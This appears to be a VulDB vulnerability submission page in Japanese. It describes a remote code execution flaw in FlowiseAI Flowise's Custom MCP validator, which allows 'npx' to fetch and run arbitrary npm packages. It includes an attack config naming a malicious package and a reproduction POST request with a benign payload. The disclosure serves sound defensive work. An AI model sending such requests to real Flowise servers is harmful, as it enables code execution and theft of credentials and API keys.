提出 #777660: FlowiseAI Flowise <= 3.0.12 OS Command Injection (CWE-78)情報

タイトル	FlowiseAI Flowise <= 3.0.12 OS Command Injection (CWE-78)
説明	# Technical Details A Remote Code Execution vulnerability exists in the Custom MCP (Model Context Protocol) component's `validateMCPServerConfig()` in `packages/components/nodes/tools/MCP/core.ts` of FlowiseAI Flowise. The command allowlist includes 'npx' which is an arbitrary code execution tool. When a user configures {"command":"npx","args":["-y","attacker-malicious-package"]}, the validation passes because npx is in the allowedCommands list and the args contain no dangerous patterns. This triggers child_process.spawn('npx', ['-y', 'attacker-malicious-package']) which downloads and executes arbitrary npm packages from the public registry with full server process privileges. # Vulnerable Code File: packages/components/nodes/tools/MCP/core.ts (line 269) Method: validateMCPServerConfig() Why: The allowedCommands list ['node', 'npx', 'python', 'python3', 'docker'] includes 'npx' which can download and execute arbitrary code. The argument validation (validateArgsForLocalFileAccess and validateCommandInjection) cannot detect this because package names are plain strings. # Reproduction 1. Deploy Flowise: docker run -d --name flowise-test -p 3001:3000 flowiseai/flowise:latest 2. Authenticate and get JWT cookie. 3. Send malicious MCP config: POST /api/v1/node-load-method/customMCP with {"loadMethod":"listActions","inputs":{"mcpServerConfig":"{\"command\":\"npx\",\"args\":[\"-y\",\"cowsay\"]}"}} 4. Verify execution: docker exec flowise-test ls -la /root/.npm/_npx/ shows npx cache directory created. # Impact - Full Remote Code Execution on the Flowise server. - Exfiltrate secrets (.env file, database credentials, LLM API keys). - Install persistence (cron jobs, SSH keys, backdoors). - Lateral movement via leaked credentials.
ソース	⚠️ https://gist.github.com/YLChen-007/4442c386739b2087db1473be703b4ccd
ユーザー	Eric-a (UID 96353)
送信	2026年03月11日 15:04 (3 月 ago)
モデレーション	2026年05月06日 09:40 (2 months later)
ステータス	重複
VulDBエントリ	358753 [FlowiseAI Flowise 迄 3.0.x /tmp/pwn 特権昇格]
ポイント	0

◂ 前概要次 ▸

Do you need the next level of professionalism?

Upgrade your account now!